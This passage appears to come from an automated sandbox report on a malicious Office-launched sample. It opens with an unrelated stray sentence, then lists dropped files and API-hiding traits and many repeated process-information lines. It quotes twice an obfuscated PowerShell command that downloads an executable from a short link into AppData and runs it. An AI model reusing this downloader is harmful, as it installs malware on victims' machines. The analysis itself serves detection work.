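To apply it to a real binary, pass the raw bytes of each executable section with that section's virtual address as base, then discard hits that a disassembler places inside known CRT helpers or outside any function.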

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe; Jump to behavior
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\cr.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\cr.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043ED22 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 24_2_0043ED22
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (28 identical entries) Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (8 identical entries) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (52 identical entries) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
